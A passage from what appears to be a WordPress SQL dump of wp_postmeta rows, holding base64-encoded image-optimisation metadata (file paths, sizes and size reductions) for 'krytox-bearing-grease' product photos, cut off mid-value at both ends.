XJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9rcnl0b3gtYmVhcmluZy1ncmVhc2U1LTIyNXgyMjUuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwva3J5dG94LWJlYXJpbmctZ3JlYXNlNS0yMjV4MjI1LmpwZyIsInJlZHVjdGlvbiI6NjY5LCJ0aW1lIjoxNDgzNTc3NDU1LCJpZCI6MTA1MX0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9rcnl0b3gtYmVhcmluZy1ncmVhc2U1LTUxMHg2MDAuanBnIiwid2lkdGgiOjUxMCwiaGVpZ2h0Ijo2MDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwva3J5dG94LWJlYXJpbmctZ3JlYXNlNS01MTB4NjAwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL2tyeXRveC1iZWFyaW5nLWdyZWFzZTUtNTEweDYwMC5qcGciLCJyZWR1Y3Rpb24iOjE0NjUsInRpbWUiOjE0ODM1Nzc0NTksImlkIjoxMDUxfSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwva3J5dG94LWJlYXJpbmctZ3JlYXNlNS0xMTR4MTMwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2tyeXRveC1iZWFyaW5nLWdyZWFzZTUtMTE0eDEzMC5qcGciLCJ3aWR0aCI6IjExNCIsImhlaWdodCI6IjEzMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9rcnl0b3gtYmVhcmluZy1ncmVhc2U1LTExNHgxMzAuanBnIiwicmVkdWN0aW9uIjo1NDYsInRpbWUiOjE0ODM1Nzc0NjIsImlkIjoxMDUxfSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwva3J5dG94LWJlYXJpbmctZ3JlYXNlNS0xNjB4MTYwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2tyeXRveC1iZWFyaW5nLWdyZWFzZTUtMTYweDE2MC5qcGciLCJ3aWR0aCI6IjE2MCIsImhlaWdodCI6IjE2MCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9rcnl0b3gtYmVhcmluZy1ncmVhc2U1LTE2MHgxNjAuanBnIiwicmVkdWN0aW9uIjo2MDEsInRpbWUiOjE0ODM1Nzc0NjYsImlkIjoxMDUxfSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwva3J5dG94LWJlYXJpbmctZ3JlYXNlNS0xODB4MTgwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2tyeXRveC1iZWFyaW5nLWdyZWFzZTUtMTgweDE4MC5qcGciLCJ3aWR0aCI6IjE4MCIsImhlaWdodCI6IjE4MCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9rcnl0b3gtYmVhcmluZy1ncmVhc2U1LTE4MHgxODAuanBnIiwicmVkdWN0aW9uIjo2MzgsInRpbWUiOjE0ODM1Nzc0NjksImlkIjoxMDUxfSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwva3J5dG94LWJlYXJpbmctZ3JlYXNlNS0yNDd4MzAwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2tyeXRveC1iZWFyaW5nLWdyZWFzZTUtMjQ3eDMwMC5qcGciLCJ3aWR0aCI6IjI0NyIsImhlaWdodCI6IjMwMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9rcnl0b3gtYmVhcmluZy1ncmVhc2U1LTI0N3gzMDAuanBnIiwicmVkdWN0aW9uIjo5NDQsInRpbWUiOjE0ODM1Nzc0NzMsImlkIjoxMDUxfSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwva3J5dG94LWJlYXJpbmctZ3JlYXNlNS0zMDB4MzAwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2tyeXRveC1iZWFyaW5nLWdyZWFzZTUtMzAweDMwMC5qcGciLCJ3aWR0aCI6IjMwMCIsImhlaWdodCI6IjMwMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9rcnl0b3gtYmVhcmluZy1ncmVhc2U1LTMwMHgzMDAuanBnIiwicmVkdWN0aW9uIjoxMDE1LCJ0aW1lIjoxNDgzNTc3NDc2LCJpZCI6MTA1MX0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2tyeXRveC1iZWFyaW5nLWdyZWFzZTUtNDAweDQwMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9rcnl0b3gtYmVhcmluZy1ncmVhc2U1LTQwMHg0MDAuanBnIiwid2lkdGgiOiI0MDAiLCJoZWlnaHQiOiI0MDAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwva3J5dG94LWJlYXJpbmctZ3JlYXNlNS00MDB4NDAwLmpwZyIsInJlZHVjdGlvbiI6MTMyMywidGltZSI6MTQ4MzU3NzQ4MCwiaWQiOjEwNTF9XQ=='); 
INSERT INTO `wp_postmeta` VALUES (29804, 1050, 'wpfc_optimisation_reduction', '2376358'); 
INSERT INTO `wp_postmeta` VALUES (29805, 1050, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwva3J5dG94LWJlYXJpbmctZ3JlYXNlNC5qcGciLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2tyeXRveC1iZWFyaW5nLWdyZWFzZTQuanBnIiwid2lkdGgiOjM1MDQsImhlaWdodCI6MjMzNiwibWltZV90eXBlIjoiIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL2tyeXRveC1iZWFyaW5nLWdyZWFzZTQuanBnIiwicmVkdWN0aW9uIjoyMzc2MzQ0LCJ0aW1lIjoxNDgzNTc3NDkyLCJpZCI6IjEwNTAifSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2tyeXRveC1iZWFyaW5nLWdyZWFzZTQtMzQweDM0MC5qcGciLCJ3aWR0aCI6MzQwLCJoZWlnaHQiOjM0MCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9rcnl0b3gtYmVhcmluZy1ncmVhc2U0LTM0MHgzNDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwva3J5dG94LWJlYXJpbmctZ3JlYXNlNC0zNDB4MzQwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU3NzQ5NCwiaWQiOjEwNTB9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwva3J5dG94LWJlYXJpbmctZ3JlYXNlNC04MDB4NTMzLmpwZyIsIndpZHRoIjo4MDAsImhlaWdodCI6NTMzLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2tyeXRveC1iZWFyaW5nLWdyZWFzZTQtODAweDUzMy5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9rcnl0b3gtYmVhcmluZy1ncmVhc2U0LTgwMHg1MzMuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTc3NDk3LCJpZCI6MTA1MH0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9rcnl0b3gtYmVhcmluZy1ncmVhc2U0LTc2OHg1MTIuanBnIiwid2lkdGgiOjc2OCwiaGVpZ2h0Ijo1MTIsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwva3J5dG94LWJlYXJpbmctZ3JlYXNlNC03Njh4NTEyLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL2tyeXRveC1iZWFyaW5nLWdyZWFzZTQtNzY4eDUxMi5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1Nzc1MDAsImlkIjoxMDUwfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2tyeXRveC1iZWFyaW5nLWdyZWFzZTQtMTYwMHgxMDY3LmpwZyIsIndpZHRoIjoxNjAwLCJoZWlnaHQiOjEwNjcsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwva3J5dG94LWJlYXJpbmctZ3JlYXNlNC0xNjAweDEwNjcuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwva3J5dG94LWJlYXJpbmctZ3JlYXNlNC0xNjAweDEwNjcuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTc3NTA0LCJpZCI6MTA1MH0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9rcnl0b3gtYmVhcmluZy1ncmVhc2U0LTI1MHgyNTAuanBnIiwid2lkdGgiOjI1MCwiaGVpZ2h0IjoyNTAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwva3J5dG94LWJlYXJpbmctZ3JlYXNlNC0yNTB4MjUwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL2tyeXRveC1iZWFyaW5nLWdyZWFzZTQtMjUweDI1MC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1Nzc1MDcsImlkIjoxMDUwfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2tyeXRveC1iZWFyaW5nLWdyZWFzZTQtMjAweDIwMC5qcGciLCJ3aWR0aCI6MjAwLCJoZWlnaHQiOjIwMCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9rcnl0b3gtYmVhcmluZy1ncmVhc2U0LTIwMHgyMDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwva3J5dG94LWJlYXJpbmctZ3JlYXNlNC0yMDB4MjAwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU3NzUxMCwiaWQiOjEwNTB9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwva3J5dG94LWJlYXJpbmctZ3JlYXNlNC0yMjV4MjI1LmpwZyIsIndpZHRoIjoyMjUsImhlaWdodCI6MjI1LCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2tyeXRveC1iZWFyaW5nLWdyZWFzZTQtMjI1eDIyNS5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9rcnl0b3gtYmVhcmluZy1ncmVhc2U0LTIyNXgyMjUuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTc3NTEyLCJpZCI6MTA1MH0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9rcnl0b3gtYmVhcmluZy1ncmVhc2U0LTUxMHg2MDAuanBnIiwid2lkdGgiOjUxMCwiaGVpZ2h0Ijo2MDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwva3J5dG94LWJlYXJpbmctZ3JlYXNlNC01MTB4NjAwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL2tyeXRveC1iZWFyaW5nLWdyZWFzZTQtNTEweDYwMC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1Nzc1MTUsImlkIjoxMDUwfSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwva3J5dG94LWJlYXJpbmctZ3JlYXNlNC0xMTR4MTMwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2tyeXRveC1iZWFyaW5nLWdyZWFzZTQtMTE0eDEzMC5qcGciLCJ3aWR0aCI6IjExNCIsImhlaWdodCI6IjEzMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9rcnl0b3gtYmVhcmluZy1ncmVhc2U0LTExNHgxMzAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTc3NTE3LCJpZCI6MTA1MH0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2tyeXRveC1iZWFyaW5nLWdyZWFzZTQtMTYweDE2MC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9rcnl0b3gtYmVhcmluZy1ncmVhc2U0LTE2MHgxNjAuanBnIiwid2lkdGgiOiIxNjAiLCJoZWlnaHQiOiIxNjAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwva3J5dG94LWJlYXJpbmctZ3JlYXNlNC0xNjB4MTYwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU3NzUyMCwiaWQiOjEwNTB9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9rcnl0b3gtYmVhcmluZy1ncmVhc2U0LTE4MHgxODAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwva3J5dG94LWJlYXJpbmctZ3JlYXNlNC0xODB4MTgwLmpwZyIsIndpZHRoIjoiMTgwIiwiaGVpZ2h0IjoiMTgwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL2tyeXRveC1iZWFyaW5nLWdyZWFzZTQtMTgweDE4MC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1Nzc1MjIsImlkIjoxMDUwfSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwva3J5dG94LWJlYXJpbmctZ3JlYXNlNC0yNDd4MzAwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2tyeXRveC1iZWFyaW5nLWdyZWFzZTQtMjQ3eDMwMC5qcGciLCJ3aWR0aCI6IjI0NyIsImhlaWdodCI6IjMwMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9rcnl0b3gtYmVhcmluZy1ncmVhc2U0LTI0N3gzMDAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTc3NTI1LCJpZCI6MTA1MH0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2tyeXRveC1iZWFyaW5nLWdyZWFzZTQtMzAweDMwMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9rcnl0b3gtYmVhcmluZy1ncmVhc2U0LTMwMHgzMDAuanBnIiwid2lkdGgiOiIzMDAiLCJoZWlnaHQiOiIzMDAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwva3J5dG94LWJlYXJpbmctZ3JlYXNlNC0zMDB4MzAwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU3NzUyNywiaWQiOjEwNTB9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9rcnl0b3gtYmVhcmluZy1ncmVhc2U0LTQwMHg0MDAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwva3J5dG94LWJlYXJpbmctZ3JlYXNlNC00MDB4NDAwLmpwZyIsIndpZHRoIjoiNDAwIiwiaGVpZ2h0IjoiNDAwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL2tyeXRveC1iZWFyaW5nLWdyZWFzZTQtNDAweDQwMC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1Nzc1MzAsImlkIjoxMDUwfV0='); 
INSERT INTO `wp_postmeta` VALUES (29806, 1049, 'wpfc_optimisation_reduction', '17422'); 
INSERT INTO `wp_postmeta` VALUES (29807, 1049, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwva3J5dG94LWJlYXJpbmctZ3JlYXNlMy5qcGciLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2tyeXRveC1iZWFyaW5nLWdyZWFzZTMuanBnIiwid2lkdGgiOjUxODQsImhlaWdodCI6MzQ1NiwibWltZV90eXBlIjoiIiwiZXJyb3JfY29kZSI6OSwidGltZSI6MTQ4MzU3NzUzNSwiaWQiOiIxMDQ5In0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9rcnl0b3gtYmVhcmluZy1ncmVhc2UzLTM0MHgzNDAuanBnIiwid2lkdGgiOjM0MCwiaGVpZ2h0IjozNDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwva3J5dG94LWJlYXJpbmctZ3JlYXNlMy0zNDB4MzQwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL2tyeXRveC1iZWFyaW5nLWdyZWFzZTMtMzQweDM0MC5qcGciLCJyZWR1Y3Rpb24iOjcxMywidGltZSI6MTQ4MzU3NzUzOCwiaWQiOjEwNDl9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwva3J5dG94LWJlYXJpbmctZ3JlYXNlMy04MDB4NTMzLmpwZyIsIndpZHRoIjo4MDAsImhlaWdodCI6NTMzLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2tyeXRveC1iZWFyaW5nLWdyZWFzZTMtODAweDUzMy5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9rcnl0b3gtYmVhcmluZy1ncmVhc2UzLTgwMHg1MzMuanBnIiwicmVkdWN0aW9uIjoxNjQzLCJ0aW1lIjoxNDgzNTc3NTQyLCJpZCI6MTA0OX0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9rcnl0b3gtYmVhcmluZy1ncmVhc2UzLTc2OHg1MTIuanBnIiwid2lkdGgiOjc2OCwiaGVpZ2h0Ijo1MTIsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwva3J5dG94LWJlYXJp